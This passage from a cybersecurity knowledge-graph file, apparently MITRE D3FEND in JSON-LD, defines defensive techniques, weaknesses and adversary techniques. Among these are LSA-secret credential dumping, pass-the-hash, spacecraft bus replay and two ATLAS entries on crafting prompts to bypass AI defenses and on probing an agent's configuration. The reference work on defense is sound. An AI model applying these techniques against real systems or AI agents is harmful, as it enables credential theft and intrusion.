      "@id": "d3f:T1003.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1003.004",
      "d3f:definition": "Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\\SECURITY\\Policy\\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)",
      "d3f:may-access": [
        {
          "@id": "d3f:Process"
        },
        {
          "@id": "d3f:SystemPasswordDatabase"
        }
      ],
      "rdfs:label": "LSA Secrets",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1003"
        },
        {
          "@id": "_:N5903ef6779984ccf82aa0e0419a201be"
        },
        {
          "@id": "_:Nefcbe403bca7418fb6d9caf0c960bd8b"
        }
      ]
    },
    {
      "@id": "_:N5903ef6779984ccf82aa0e0419a201be",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "_:Nefcbe403bca7418fb6d9caf0c960bd8b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemPasswordDatabase"
      }
    },
    {
      "@id": "d3f:DisplayAdapter",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A graphics card (also called a display card, video card, display adapter, or graphics adapter) is an expansion card which generates a feed of output images to a display device (such as a computer monitor). Frequently, these are advertised as discrete or dedicated graphics cards, emphasizing the distinction between these and integrated graphics. At the core of both is the graphics processing unit (GPU), which is the main part that does the actual computations, but should not be confused with the video card as a whole, although \"GPU\" is often used to refer to video cards.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Video_card"
      },
      "rdfs:label": "Display Adapter",
      "rdfs:subClassOf": {
        "@id": "d3f:OutputDevice"
      },
      "skos:altLabel": [
        "Display Card",
        "Graphics Adapter",
        "Video Card"
      ]
    },
    {
      "@id": "d3f:EX-0001.02",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0001.02",
      "d3f:definition": "Instead of the RF path, the attacker targets internal command/data handling by injecting or retransmitting messages on the spacecraft bus (e.g., 1553, SpaceWire, custom). Because many subsystems act on the latest message or on message rate rather than on uniqueness, a flood of historical yet well-formed frames can consume bandwidth, starve critical publishers, or cause subsystems to perform the same action repeatedly. Secondary effects include stale sensor values being re-consumed, watchdog timers being reset at incorrect intervals, and autonomy rules misclassifying the situation due to out-of-order but valid-looking events. On time-triggered or scheduled buses, replaying at precise offsets can collide with or supersede legitimate messages, steering system state without changing software. The goal is to harness the bus’s determinism, repeating prior internal stimuli to recreate prior effects or to induce resource exhaustion.",
      "d3f:produces": {
        "@id": "d3f:BusNetworkTraffic"
      },
      "rdfs:label": "Bus Traffic Replay - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0001/02/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0001"
        },
        {
          "@id": "_:Nf2c796c044e84ba99f3d8fd726f6e770"
        }
      ],
      "skos:prefLabel": "Bus Traffic Replay"
    },
    {
      "@id": "_:Nf2c796c044e84ba99f3d8fd726f6e770",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BusNetworkTraffic"
      }
    },
    {
      "@id": "d3f:AML.T0065",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0065",
      "d3f:definition": "Adversaries may use their acquired knowledge of the target generative AI system to craft prompts that bypass its defenses and allow malicious instructions to be executed.\n\nThe adversary may iterate on the prompt to ensure that it works as-intended consistently.",
      "rdfs:label": "LLM Prompt Crafting - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0065"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "LLM Prompt Crafting"
    },
    {
      "@id": "d3f:ModalLogic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-ML",
      "d3f:definition": "Modal logic is a collection of formal systems developed to represent statements about necessity and possibility. It plays a major role in philosophy of language, epistemology, metaphysics, and natural language semantics.",
      "d3f:kb-article": "## References\n1. Modal logic. (2023, June 4). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Modal_logic)",
      "rdfs:label": "Modal Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:SymbolicAI"
      }
    },
    {
      "@id": "d3f:UserInputFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Generic function that receives direct user input from an untrusted source.",
      "rdfs:label": "User Input Function",
      "rdfs:subClassOf": {
        "@id": "d3f:InputFunction"
      }
    },
    {
      "@id": "d3f:T1637",
      "@type": "owl:Class",
      "d3f:attack-id": "T1637",
      "d3f:definition": "Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. This algorithm can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.",
      "rdfs:label": "Dynamic Resolution - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCommandAndControlTechnique"
      },
      "skos:prefLabel": "Dynamic Resolution"
    },
    {
      "@id": "d3f:UnlockAccount",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:UnlockAccount"
      ],
      "d3f:d3fend-id": "D3-ULA",
      "d3f:definition": "Restoring a user account's access to resources by unlocking a locked User Account.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CybersecurityIncidentandVulnerabilityResponsePlaybooks"
      },
      "d3f:restores": {
        "@id": "d3f:UserAccount"
      },
      "rdfs:label": "Unlock Account",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:RestoreUserAccountAccess"
        },
        {
          "@id": "_:N9251a249731b4a00801a1cb3b47f5b05"
        }
      ]
    },
    {
      "@id": "_:N9251a249731b4a00801a1cb3b47f5b05",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restores"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:Reference-HostIntrusionPreventionSystemUsingSoftwareAndUserBehaviorAnalysis_SophosLtd",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20110023115A1"
      },
      "d3f:kb-abstract": "In embodiments of the present invention improved capabilities are described for threat detection using a behavioral-based host-intrusion prevention method and system for monitoring a user interaction with a computer, software application, operating system, graphic user interface, or some other component or client of a computer network, and performing an action to protect the computer network based at least in part on the user interaction and a computer code process executing during or in association with a computer usage session.",
      "d3f:kb-author": "Clifford C. Wright",
      "d3f:kb-mitre-analysis": "The patent describes a technique for performing behavior based threat detection. User and code behavior data is collected and stored to create baseline user and code behavior profiles. User behavior data collected over a user session or over multiple sessions can include a user:\n\n* clicking on a link\n* scrolling down a page\n* opening or closing a window\n* downloading a file\n* saving a file\n* running a file\n* typing a keyword\n\nCode behavior monitored includes code:\n\n* copying itself to a system folder\n* setting a run key to itself in the registry\n* setting a second runkey to itself in the registry in\na different location\n* disabling OS tools in the registry\n* opening a hidden file\n\nThe user interaction and the code process executed during the user session are monitored and compared with predetermined malicious behavior profiles that are typically present in a malicious user session.  The predetermined collection of malicious behaviors are created based on analysis of families of malware in run time in a threat research facility. If a match is made an action is taken that can include isolating the computer on which the user interaction occurs and limiting network access to or from the computer.",
      "d3f:kb-organization": "Sophos Ltd",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:ResourceAccessPatternAnalysis"
        },
        {
          "@id": "d3f:SystemDaemonMonitoring"
        },
        {
          "@id": "d3f:WebSessionActivityAnalysis"
        }
      ],
      "d3f:kb-reference-title": "Host intrusion prevention system using software and user behavior analysis",
      "rdfs:label": "Reference - Host intrusion prevention system using software and user behavior analysis - Sophos Ltd"
    },
    {
      "@id": "d3f:CertificateAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:CertificateAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:CertificateFile"
      },
      "d3f:d3fend-id": "D3-CA",
      "d3f:definition": "Analyzing Public Key Infrastructure certificates to detect if they have been misconfigured or spoofed using both network traffic, certificate fields and third-party logs.",
      "d3f:kb-article": "## How it works\nCertificate Analysis ensures that the data elements of the certificate are current and anchored in a known trust model. Certificate authorities, revocation lists, and third-party secure logs are used in the analysis. Analysis includes detection of server impersonation, phishing domains, and forged certificates.\n\nTLS certificates are designed to expire to ensure that the cryptographic keys are forced to be changed on a regular basis. The certificates in the trust path also expire and can cause a break in the trust chain. This means that even if a server certificate is updated correctly, intermediate certificates can expire and the trust chain is not maintained. This can cause services to become unavailable.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SecuringWebTransactions"
      },
      "rdfs:label": "Certificate Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:Ned1d89aefc53456bae3da69698f43505"
        }
      ]
    },
    {
      "@id": "_:Ned1d89aefc53456bae3da69698f43505",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CertificateFile"
      }
    },
    {
      "@id": "d3f:PowerAndThermalDeviceEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving power supplies, batteries, or thermal management devices. These events represent changes in power states, temperature thresholds, or cooling system activity.",
      "rdfs:label": "Power and Thermal Device Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDeviceEvent"
        },
        {
          "@id": "_:N02059d89ee914dffa8bbcaab7caf90de"
        }
      ]
    },
    {
      "@id": "_:N02059d89ee914dffa8bbcaab7caf90de",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Sensor"
      }
    },
    {
      "@id": "d3f:UserSessionInitConfigAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:UserSessionInitConfigAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:UserInitConfigurationFile"
      },
      "d3f:d3fend-id": "D3-USICA",
      "d3f:definition": "Analyzing modifications to user session config files such as .bashrc or .bash_profile.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-IdentificationAndExtractionOfKeyForensicsIndicatorsOfCompromiseUsingSubject-specificFilesystemViews"
        },
        {
          "@id": "d3f:Reference-RegistryKeySecurityAndAccessRights"
        },
        {
          "@id": "d3f:Reference-CAR-2020-09-002%3AComponentObjectModelHijacking_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-11-011%3ARegistryEditFromScreensaver"
        }
      ],
      "d3f:synonym": "User Startup Config Analysis",
      "rdfs:label": "User Session Init Config Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperatingSystemMonitoring"
        },
        {
          "@id": "_:N3fe96addbd9741a4b762926f62d84ec9"
        }
      ]
    },
    {
      "@id": "_:N3fe96addbd9741a4b762926f62d84ec9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInitConfigurationFile"
      }
    },
    {
      "@id": "d3f:OTChangeDataCommand",
      "@type": "owl:Class",
      "d3f:definition": "OT command that modifies existing data on a remote device.",
      "rdfs:comment": [
        "BACnet: atomicWriteFile\nBACnet: writeProperty\nBACnet: writePropertyMultiple\nBACnet: write-group ",
        "CIP: Set Attributes All\nCIP: Set Attribute List\nCIP: Set Attribute Single\nCIP: Set Member",
        "GE-SRTP: WRITE SYSTEM MEMORY\nGE-SRTP: WRITE TASK MEMORY ",
        "Modbus: Write Single Coil\nModbus: Write Single Register\nModbus: Write Multiple Coils\nModbus: Write Multiple Registers\nModbus: Write File Record\nModbus: Mask Write Register\nModbus: Read Write Register"
      ],
      "rdfs:label": "OT Change Data Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTWriteCommand"
      }
    },
    {
      "@id": "d3f:TimeSeriesDatabase",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A specialized database optimized for storing and retrieving time-stamped data.",
      "rdfs:label": "Time Series Database",
      "rdfs:subClassOf": {
        "@id": "d3f:Database"
      }
    },
    {
      "@id": "d3f:REC-0001.01",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0001.01",
      "d3f:definition": "Adversaries target knowledge of flight and ground software to identify exploitable seams and to build high-fidelity emulators for rehearsal. Valuable details include RTOS selection and version, process layout, inter-process messaging patterns, memory maps and linker scripts, fault-detection/isolation/recovery logic, mode management and safing behavior, command handlers and table services, bootloaders, patch/update mechanisms, crypto libraries, device drivers, and test harnesses. Artifacts may be source code, binaries with symbols, stripped images with recognizable patterns, configuration tables, and SBOMs that reveal vulnerable dependencies. With these, a threat actor can reverse engineer command parsing, locate debug hooks, craft inputs that bypass FDIR, or time payload and bus interactions to produce cascading effects. Supply-chain access to vendors of COTS components, open-source communities, or integrators can be used to insert weaknesses or to harvest build metadata. Even partial disclosures, such as a unit test name, an assert message, or a legacy API, shrink the search space for exploitation.",
      "rdfs:label": "Software Design - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0001/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0001"
      },
      "skos:prefLabel": "Software Design"
    },
    {
      "@id": "d3f:CWE-1319",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1319",
      "d3f:definition": "The device is susceptible to electromagnetic fault injection attacks, causing device internal information to be compromised or security mechanisms to be bypassed.",
      "rdfs:label": "Improper Protection against Electromagnetic Fault Injection (EM-FI)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:NetworkTrafficFiltering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:NetworkTrafficFiltering"
      ],
      "d3f:d3fend-id": "D3-NTF",
      "d3f:definition": "Restricting network traffic originating from any location.",
      "d3f:filters": [
        {
          "@id": "d3f:NetworkTraffic"
        },
        {
          "@id": "d3f:OTProtocolMessage"
        },
        {
          "@id": "d3f:RemoteCommand"
        }
      ],
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-ActiveFirewallSystemAndMethodology_McAfeeLLC"
        },
        {
          "@id": "d3f:Reference-AutomaticallyGeneratingRulesForConnectionSecurity_Microsoft"
        },
        {
          "@id": "d3f:Reference-FWTK-FirewallToolkit_"
        },
        {
          "@id": "d3f:Reference-FirewallForInterentAccess_SecureComputingLLC"
        },
        {
          "@id": "d3f:Reference-FirewallForProcessingAConnectionlessNetworkPacket_NationalSecurityAgency"
        },
        {
          "@id": "d3f:Reference-FirewallForProcessingConnection-orientedAndConnectionlessDatagramsOverAConnection-orientedNetwork_NationalSecurityAgency"
        },
        {
          "@id": "d3f:Reference-FirewallsThatFilterBasedUponProtocolCommands_IntelCorp"
        },
        {
          "@id": "d3f:Reference-MethodForControllingComputerNetworkSecurity_CheckpointSoftwareTechnologiesLtd"
        },
        {
          "@id": "d3f:Reference-NetworkFirewallWithProxy_SecureComputingLLC"
        }
      ],
      "rdfs:label": "Network Traffic Filtering",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkIsolation"
        },
        {
          "@id": "_:N6319c44ae4c84d1786c20e18d3c61a54"
        },
        {
          "@id": "_:N06d9f7bfcd6e43e08790aa54e392546f"
        },
        {
          "@id": "_:N02312712e3594ce08f51458628cd4c84"
        }
      ]
    },
    {
      "@id": "_:N6319c44ae4c84d1786c20e18d3c61a54",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "_:N06d9f7bfcd6e43e08790aa54e392546f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTProtocolMessage"
      }
    },
    {
      "@id": "_:N02312712e3594ce08f51458628cd4c84",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RemoteCommand"
      }
    },
    {
      "@id": "d3f:UserAccountUpdateEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing updates to a user account, including changes to its attributes or configuration.",
      "rdfs:label": "User Account Update Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserAccountEvent"
        },
        {
          "@id": "_:N219da764c4864539ab3d6928282d1935"
        }
      ]
    },
    {
      "@id": "_:N219da764c4864539ab3d6928282d1935",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccountCreationEvent"
      }
    },
    {
      "@id": "d3f:Reference-LUKS1On-DiskFormatSpecificationVersion1.2.3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://mirrors.edge.kernel.org/pub/linux/utils/cryptsetup/LUKS_docs/on-disk-format.pdf"
      },
      "d3f:kb-abstract": "LUKS is short for \"Linux Unified Key Setup\". It has initially been developed to remedy the unpleasantness a user experienced that arise from deriving the encryption setup from changing user space, and forgotten command line arguments. The result of this changes are an unaccessible encryption storage. The reason for this to happen was, a unstandardised way to read, process and set up encryption keys, and if the user was unlucky, he upgraded to an incompatible version of user space tools that needed a good deal of knowledge to use with old encryption volumes.",
      "d3f:kb-author": "Clemens Fruhwirth",
      "d3f:kb-reference-of": {
        "@id": "d3f:DiskEncryption"
      },
      "d3f:kb-reference-title": "LUKS1 On-Disk Format SpecificationVersion 1.2.3",
      "rdfs:label": "Reference - LUKS1 On-Disk Format SpecificationVersion 1.2.3"
    },
    {
      "@id": "d3f:T1071.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1071.002",
      "d3f:definition": "Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetFileTransferTraffic"
      },
      "rdfs:label": "File Transfer Protocols",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1071"
        },
        {
          "@id": "_:N09f7df9108f94834b8618f95247ec296"
        }
      ]
    },
    {
      "@id": "_:N09f7df9108f94834b8618f95247ec296",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetFileTransferTraffic"
      }
    },
    {
      "@id": "d3f:CWE-662",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-662",
      "d3f:definition": "The product utilizes multiple threads or processes to allow temporary access to a shared resource that can only be exclusive to one process at a time, but it does not properly synchronize these actions, which might cause simultaneous accesses of this resource by multiple threads or processes.",
      "rdfs:label": "Improper Synchronization",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-664"
        },
        {
          "@id": "d3f:CWE-691"
        }
      ]
    },
    {
      "@id": "d3f:T1593",
      "@type": "owl:Class",
      "d3f:attack-id": "T1593",
      "d3f:definition": "Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)",
      "rdfs:label": "Search Open Websites/Domains",
      "rdfs:subClassOf": {
        "@id": "d3f:ReconnaissanceTechnique"
      }
    },
    {
      "@id": "d3f:T1590.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1590.006",
      "d3f:definition": "Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.",
      "rdfs:label": "Network Security Appliances",
      "rdfs:subClassOf": {
        "@id": "d3f:T1590"
      }
    },
    {
      "@id": "d3f:OTProtocolMessage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Packets generated by an operational technology protocol contain an OT protocol message.",
      "rdfs:label": "OT Protocol Message",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalMessage"
      }
    },
    {
      "@id": "d3f:HTTPRequestEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an HTTP request is sent from a client to a server over an established TCP connection.",
      "rdfs:label": "HTTP Request Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HTTPEvent"
      }
    },
    {
      "@id": "d3f:T1075",
      "@type": "owl:Class",
      "d3f:attack-id": "T1075",
      "d3f:definition": "Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1550.002",
      "rdfs:label": "Pass the Hash",
      "rdfs:seeAlso": {
        "@id": "d3f:T1550.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:LateralMovementTechnique"
      }
    },
    {
      "@id": "d3f:VariableTypeValidation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3-VTV",
      "d3f:definition": "Ensuring that a variable has the correct type.",
      "d3f:hardens": {
        "@id": "d3f:PointerDereferencingFunction"
      },
      "d3f:kb-article": "## How it Works\nA developer should consider how the variable will be used throughout the program and choose the correct variable type.\nA developer should programmatically check if a variable has the correct (expected) type before using that variable.\n\n## Considerations\n* The result of an operation on an unexpected variable type will vary based on the language.\n* Note: This resource should not be considered a definitive or exhaustive coding guideline.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-TypeSystems_Princeton"
      },
      "rdfs:label": "Variable Type Validation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SourceCodeHardening"
        },
        {
          "@id": "_:Nc37977acba8144c1aa2f486a192bdb21"
        }
      ]
    },
    {
      "@id": "_:Nc37977acba8144c1aa2f486a192bdb21",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PointerDereferencingFunction"
      }
    },
    {
      "@id": "d3f:First-orderLogic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-FOL",
      "d3f:definition": "First-order logic is a collection of formal systems used in mathematics, philosophy, linguistics, and computer science. First-order logic uses quantified variables over non-logical objects, and allows the use of sentences that contain variables.",
      "d3f:kb-article": "## How it works\n\nFor propositions such as \"Socrates is a man\", one can have expressions in the form \"there exists x such that x is Socrates and x is a man\", where \"there exists\" is a quantifier, while x is a variable. This distinguishes it from propositional logic, which does not use quantifiers or relations.\n\nThe term \"first-order\" distinguishes first-order logic from higher-order logic, in which there are predicates having predicates or functions as arguments, or in which quantification over predicates, functions, or both, are permitted.\n\n## Considerations\n\n- Advantages:\n-- First-order logic is more expressive than propositional logic; one can talk about objects and their properties, relations between objects.\n-- First-order logic is able to make use of variables and quantifiers (e.g., \"for all\" and \"exists\".)\n-- First-order logic supports power forms of reasoning, such as inferring the properties of an unknown object from the properties of known objects.\n\n- Disadvantages:\n-- First-order logic is more difficult to learn and use than propositional logic, due to its greater complexity.\n-- First-order logic is also less tractable than propositional logic in many cases; reasoning about quantifiers and variables adds complexity.\n-- First-order logic can be difficult to apply in practice, due to the need to find appropriate axioms and rules for each application.\n\n### Verification Approach\n\n- Automated theorem provers can assist in formal verification, performing automated reasoning over system modeled in first-order logic and explore a complete space of system behaviors\n- First-order logic may be more expressive than necessary for many types of problems and may be more difficult to verify by SMEs.\n- Theorem provers based in FOL are capable of use in software verification tasks, but an SMT solver such as Z3 might be more appropriate.\n- Defining a set of competency questions (i.e., query use cases for a 
first-order logic ontology) can help scope the logic required for a complete solution.\n\n### Validation Approach\n\n- Domain SMEs should be identified to review the analytics results and compare them to expected results for a given input.\n- Where possible, an outside team of SMEs should inspect the formal logic specification of a system against its stated requirements and suitability to address its domain problem sets.\n- Defining a set of competency questions and the expected results provides one means of validation.\n\n## References\n\n1.  First-order logic. (2023, May 26). In _Wikipedia_.  [Link](https://en.wikipedia.org/wiki/First-order_logic)\n2. Shapiro, S. and Kissel, T. Classical Logic. (2022). Stanford Encyclopedia of Philosophy. [Link](https://plato.stanford.edu/entries/logic-classical/)\n3. A.I. For Anyone. First-order Logic (n.d.). [Link](https://www.aiforanyone.org/glossary/first-order-logic)\n4. Smith, P. An Introduction to Formal Logic. (2020). [Link](https://doi.org/10.1017/9781108328999)\n5. Gruninger, M. and Fox, M. (1995). Methodology for the Design and Evaluation of Ontologies. [Link](https://www.researchgate.net/publication/2288533_Methodology_for_the_Design_and_Evaluation_of_Ontologies)\n6. Keet, C., Suarez-Figurosa, M., and Poveda-Villalon, M. (2014). Pitfalls in Ontologies and TIPS to Prevent Them. [Link](https://dl.acm.org/doi/10.4018/ijswis.2014040102)\n7. Bjorner, N. et al. The inner magic behind the Z3 theorem prover. (2019) [Link](https://www.microsoft.com/en-us/research/blog/the-inner-magic-behind-the-z3-theorem-prover/)",
      "d3f:synonym": [
        "FOL",
        "First-order Predicate Calculus",
        "Quantificational Logic"
      ],
      "rdfs:label": "First-order Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:PredicateLogic"
      }
    },
    {
      "@id": "d3f:LinuxWrite",
      "@type": "owl:Class",
      "d3f:definition": "Write to a file descriptor.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/write.2.html"
      },
      "rdfs:label": "Linux Write",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIWriteFile"
      }
    },
    {
      "@id": "d3f:OperatingSystemMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OperatingSystemMonitoring"
      ],
      "d3f:d3fend-id": "D3-OSM",
      "d3f:definition": "The operating system software, for D3FEND's purposes, includes the kernel and its process management functions, hardware drivers, initialization or boot logic. It also includes and other key system daemons and their configuration. The monitoring or analysis of these components for unauthorized activity constitute **Operating System Monitoring**.",
      "d3f:enables": {
        "@id": "d3f:Detect"
      },
      "d3f:kb-article": "## Technique Overview\n\n\"An operating system (OS) is system software that manages computer hardware and software resources and provides common services for computer programs.\" [1]\n\nOperating System Monitoring Techniques have varied implementations including built-in kernel modules, third-party privileged system daemons, or even standard systems administration tools included with an operating system.\n\n1. http://dbpedia.org/resource/Operating_system",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-HostIntrusionPreventionSystemUsingSoftwareAndUserBehaviorAnalysis_SophosLtd"
        },
        {
          "@id": "d3f:Reference-UserActivityFromClearingEventLogs_MITRE"
        }
      ],
      "rdfs:label": "Operating System Monitoring",
      "rdfs:subClassOf": {
        "@id": "d3f:PlatformMonitoring"
      }
    },
    {
      "@id": "d3f:AML.T0084",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0084",
      "d3f:definition": "Adversaries may attempt to discover configuration information for AI agents present on the victim's system. Agent configurations can include tools or services they have access to.\n\nAdversaries may directly access agent configuring dashboards or configuration files. They may also obtain configuration details by prompting the agent with questions such as \"What tools do you have access to?\"\n\nAdversaries can use the information they discover about AI agents to help with targeting.",
      "rdfs:label": "Discover AI Agent Configuration - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0084"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDiscoveryTechnique"
      },
      "skos:prefLabel": "Discover AI Agent Configuration"
    },
    {
      "@id": "d3f:CentralTendency",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-CT",
      "d3f:definition": "A measure of central tendency ) is a summary measure that attempts to describe a whole set of data with a single value that represents the middle or centre of its distribution.",
      "d3f:kb-article": "## References\nAustralian Bureau of Statistics. (n.d.). Measures of Central Tendency. [Link](https://www.abs.gov.au/statistics/understanding-statistics/statistical-terms-and-concepts/measures-central-tendency)\n\nWikipedia. (n.d.). Central tendency. [Link](https://en.wikipedia.org/wiki/Central_tendency)",
      "rdfs:label": "Central Tendency",
      "rdfs:subClassOf": {
        "@id": "d3f:DescriptiveStatistics"
      }
    },
    {
      "@id": "d3f:ATTACKMergedThing",
      "@type": "owl:Class",
      "rdfs:label": "ATTACK Merged Thing",
      "rdfs:subClassOf": {
